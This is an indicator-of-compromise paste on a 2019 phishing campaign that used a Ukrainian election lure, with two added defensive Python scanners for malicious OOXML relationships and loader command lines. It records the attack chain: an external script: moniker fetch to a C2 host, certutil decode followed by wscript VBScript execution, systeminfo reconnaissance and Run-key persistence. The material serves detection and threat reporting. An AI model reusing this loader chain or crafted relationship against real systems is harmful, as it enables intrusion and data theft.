- #IOC #OptiData #VR #APT #XML_RELS #WSH #EXE_Less #Recon
- https://pastebin.com/kiSbFi36
- attack_vector
- --------------
- email attach .ZIP > .PPSX > XML_RELS > GET > WSH > %temp%\tmp4E07.tmp > %userprofile%\NTUSR.DAT
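Added example, not part of the original paste: a scanner for the XML_RELS stage of the chain above. Office resolves every relationship in an OOXML package's *.rels parts when the document opens; one with TargetMode="External" and a URL Target (here a script: moniker pointing at the .hmf host) is fetched with no macro prompt. The PPSX below is constructed in memory; only the URL comes from the netwrk section, and the relationship type and moniker form used in the real lure are assumptions.

```python
"""
Scan an OOXML package (.ppsx/.pptx/.docx/.xlsx) for relationships whose
Target is external, and triage those that make Office reach out or run code.
Added example; not code from the paste or from the sample it describes.
"""
import io
import sys
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TAG = "{%s}Relationship" % RELS_NS


def external_relationships(doc_bytes):
    """Return [(rels_part, short_type, target)] for every relationship marked External."""
    found = []
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_TAG):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                found.append((name, short_type, rel.get("Target", "")))
    return found


def triage(rels):
    """Keep the externals a human should look at: moniker schemes that make
    Office execute code, or non-hyperlink relationships that reach the network.
    Plain http(s) hyperlinks are common in benign decks and are left out."""
    hits = []
    for part, short_type, target in rels:
        t = target.lower()
        if t.startswith(("script:", "mhtml:")):
            hits.append((part, short_type, target, "code-executing moniker"))
        elif t.startswith(("http://", "https://", "file:", "\\\\")) and short_type != "hyperlink":
            hits.append((part, short_type, target, "remote %s target" % short_type))
    return hits


def build_sample_ppsx():
    """Constructed minimal package (not the real Prezent_UA_2k_berezen_PRESS.ppsx).
    The oleObject/script: layout is an assumption; the URL is from the paste."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        "</Types>"
    )
    slide_rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="script:http://socis.cf/wj5yuxmp.hmf" TargetMode="External"/>'
        "</Relationships>" % RELS_NS
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", slide_rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Usage: python rels_scan.py suspicious.ppsx   (no argument: scan the constructed sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_ppsx()
    for part, short_type, target, why in triage(external_relationships(data)):
        print("%s  %s  %s  [%s]" % (part, short_type, target, why))
```

Run it against a quarantined copy of the attachment before detonation; the scanner only unzips and parses XML, so it never triggers the fetch. Anything it reports in the moniker category is worth pulling the target URL into the netwrk block without waiting for a sandbox.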
- email_headers
- --------------
- Received: from o1.31pqt.s2shared.stmpendgrid.net ([167.89.100.227])
- Received: by filter0029p3iad2.sendgrid.net
- Received: from OTQ2MjY1Mw (host-94-103-82-136.hosted-by-vdsina.ru [94.103.82.136]) by ismtpd0007p1lon1.sendgrid.net
- Date: Thu, 28 Mar 2019 12:46:31 +0000 (UTC)
- From: socis@socis.kiev.ua
- To: user00@victim01
- Subject: ПРЕС-РЕЛІЗ ЗА РЕЗУЛЬТАТАМИ СОЦІОЛОГІЧНОГО ДОСЛІДЖЕННЯ «ПРЕЗИДЕНТСЬКІ ВИБОРИ 2019-БЕРЕЗЕНЬ» [Ukrainian: PRESS RELEASE ON THE RESULTS OF THE SOCIOLOGICAL SURVEY "PRESIDENTIAL ELECTIONS 2019 - MARCH"]
- files
- --------------
- SHA-256 30f568a18bb7f3ce2419cb3f7b4b8f7619072b211b24a9c462a6c312707d0a72
- File name Prezent_UA_2k_berezen_PRESS.ppsx [Microsoft PowerPoint 2007+]
- File size 391.03 KB (400418 bytes)
- SHA-256 360c967784e869cc5851b66b873f78341fbfee5fc8da367e58ba85882639c91f
- File name wj5yuxmp.hmf [XML document, ASCII text, with very long lines, with CRLF]
- File size 272.7 KB (279242 bytes)
- SHA-256 09c4c4df7657c89ae55529c916b19d6acdbb7ccc2112df03f99eb09e66d3ee5b
- File name tmp4E07.tmp [ASCII text, with very long lines, with no line terminators]
- File size 270.93 KB (277430 bytes)
- SHA-256 85b8d699f0bc521a11a5e58e81cc6a39937adc341073177added1547ba39e0d3
- File name NTUSR.DAT [ASCII text, with very long lines, with no line terminators]
- File size 203.19 KB (208070 bytes)
- activity
- **************
- PL_SCR (payload script host) = C2 = 185.176.43.94
- netwrk
- --------------
- 185.176.43.94 socis.cf GET /wj5yuxmp.hmf HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;)
- 185.176.43.94 tk99.gq GET / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
- 185.176.43.94 tk99.gq POST / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
- 185.176.43.94 tk99.gq GET / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
- 185.176.43.94 tk99.gq POST / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
- 185.176.43.94 tk99.gq GET / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
- comp
- --------------
- POWERPNT.EXE 2844 TCP localhost 49232 185.176.43.94 80 ESTABLISHED
- wscript.exe 1104 TCP localhost 49224 185.176.43.94 80 ESTABLISHED
- proc
- --------------
- C:\Program Files (x86)\Microsoft Office\Office12\POWERPNT.EXE /s C:\Users\operator\Desktop\Prezent_UA_2k_berezen_PRESS.ppsx
- C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- C:\Windows\system32\cmd.exe /c certutil -decode C:\tmp\tmp4E07.tmp C:\tmp\NTUSR.DAT && timeout 10 && wscript.exe //B //E:vbs C:\tmp\NTUSR.DAT
- C:\Windows\system32\certutil -decode C:\tmp\tmp4E07.tmp C:\tmp\NTUSR.DAT
- C:\Windows\system32\timeout 10
- C:\Windows\system32\wscript.exe //B //E:vbs C:\tmp\NTUSR.DAT
- "C:\Windows\System32\wscript.exe" //B //E:vbs "C:\Users\operator\NTUSR.DAT"
- "C:\Windows\System32\cmd.exe" /c mode con cp select=65001 | systeminfo > C:\tmp\radB50A0.tmp
- C:\Windows\system32\mode.com con cp select=65001
- C:\Windows\system32\systeminfo.exe
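Added example, not part of the original paste: command-line heuristics for the loader chain recorded in the proc section. Each command line is checked for three signals (certutil -decode writing something that is not a certificate, wscript/cscript forced into VBScript with //E:vbs on a file whose extension is not a script type, and systeminfo redirected into a file), and the decode output paths are then correlated with the WSH targets so the decode-then-execute pair stands out on its own. The sample lines are copied from the proc section above; the extension lists and the choice of signals are assumptions.

```python
"""
Flag the certutil -decode / wscript //E:vbs / systeminfo pattern in process
command lines and correlate decoded files with executed ones.
Added example; not code from the paste.
"""
import ntpath
import re
import sys

# Process command lines as listed in the paste's proc section.
SAMPLE_PROC_LINES = [
    r"C:\Program Files (x86)\Microsoft Office\Office12\POWERPNT.EXE /s C:\Users\operator\Desktop\Prezent_UA_2k_berezen_PRESS.ppsx",
    r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",
    r"C:\Windows\system32\cmd.exe /c certutil -decode C:\tmp\tmp4E07.tmp C:\tmp\NTUSR.DAT && timeout 10 && wscript.exe //B //E:vbs C:\tmp\NTUSR.DAT",
    r"C:\Windows\system32\certutil -decode C:\tmp\tmp4E07.tmp C:\tmp\NTUSR.DAT",
    r"C:\Windows\system32\timeout 10",
    r"C:\Windows\system32\wscript.exe //B //E:vbs C:\tmp\NTUSR.DAT",
    r'C:\Windows\System32\wscript.exe" //B //E:vbs "C:\Users\operator\NTUSR.DAT',
    r'C:\Windows\System32\cmd.exe" /c mode con cp select=65001 | systeminfo > C:\tmp\radB50A0.tmp',
    r"C:\Windows\system32\mode.com con cp select=65001",
    r"C:\Windows\system32\systeminfo.exe",
]

# Assumed lists: extensions WSH normally runs, and what certutil -decode legitimately produces.
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}
CERT_EXTS = (".cer", ".crt", ".pem", ".p7b")

CERTUTIL_DECODE = re.compile(r'certutil(?:\.exe)?"?\s+[-/]decode\s+"?([^"\s]+)"?\s+"?([^"\s]+)', re.I)
WSH_VBS = re.compile(r'[wc]script(?:\.exe)?"?\s+(?:/+\S+\s+)*/+E:vbs\s+"?([^"\s]+)', re.I)
SYSINFO_REDIRECT = re.compile(r'systeminfo[^|>]*>\s*"?([^"\s]+)', re.I)


def flag_command_line(cmd):
    """Return the reasons one command line is suspicious (empty list if none)."""
    reasons = []
    m = CERTUTIL_DECODE.search(cmd)
    if m and not m.group(2).lower().endswith(CERT_EXTS):
        reasons.append("certutil -decode to non-certificate file " + m.group(2))
    for m in WSH_VBS.finditer(cmd):
        if ntpath.splitext(m.group(1))[1].lower() not in SCRIPT_EXTS:
            reasons.append("WSH //E:vbs on non-script extension " + m.group(1))
    m = SYSINFO_REDIRECT.search(cmd)
    if m:
        reasons.append("systeminfo output redirected to " + m.group(1))
    return reasons


def scan_process_list(lines):
    """[(command_line, reasons)] for every line that trips at least one heuristic."""
    hits = []
    for cmd in lines:
        reasons = flag_command_line(cmd)
        if reasons:
            hits.append((cmd, reasons))
    return hits


def decode_then_execute(lines):
    """Paths that certutil decoded and WSH later executed (lower-cased, sorted).
    A non-empty result is the strongest signal here: the decoded blob is the script."""
    decoded, executed = set(), set()
    for cmd in lines:
        m = CERTUTIL_DECODE.search(cmd)
        if m:
            decoded.add(m.group(2).lower())
        for m in WSH_VBS.finditer(cmd):
            executed.add(m.group(1).lower())
    return sorted(decoded & executed)


if __name__ == "__main__":
    # Usage: python proc_scan.py < process_lines.txt   (no stdin: scan the paste's lines)
    lines = [l.rstrip("\r\n") for l in sys.stdin] if not sys.stdin.isatty() else SAMPLE_PROC_LINES
    for cmd, reasons in scan_process_list(lines):
        print(cmd)
        for r in reasons:
            print("    -", r)
    for path in decode_then_execute(lines):
        print("decode-then-execute:", path)
```

The extension check is what separates this from a generic certutil alert: certutil -decode to a .dat that wscript is then told to treat as VBScript is the same trick regardless of the file names chosen, so the rule survives the next rename. The same regexes map directly onto Sysmon Event ID 1 CommandLine fields or EDR process telemetry.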
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 29.03.2019 12:23
- (Default) c:\users\operator\ntusr.dat 29.03.2019 12:23
- wscript.exe //B //E:vbs "C:\Users\operator\NTUSR.DAT"
- drop
- --------------
- %temp%\tmp4E07.tmp
- %userprofile%\NTUSR.DAT
- # # #
- https://www.virustotal.com/gui/file/30f568a18bb7f3ce2419cb3f7b4b8f7619072b211b24a9c462a6c312707d0a72/details
- https://www.virustotal.com/gui/file/360c967784e869cc5851b66b873f78341fbfee5fc8da367e58ba85882639c91f/details
- https://www.virustotal.com/gui/file/09c4c4df7657c89ae55529c916b19d6acdbb7ccc2112df03f99eb09e66d3ee5b/details
- https://www.virustotal.com/gui/file/85b8d699f0bc521a11a5e58e81cc6a39937adc341073177added1547ba39e0d3/details
- https://urlscan.io/result/83a3366e-12ee-4a6c-a326-a8eb19bc77c7
- VR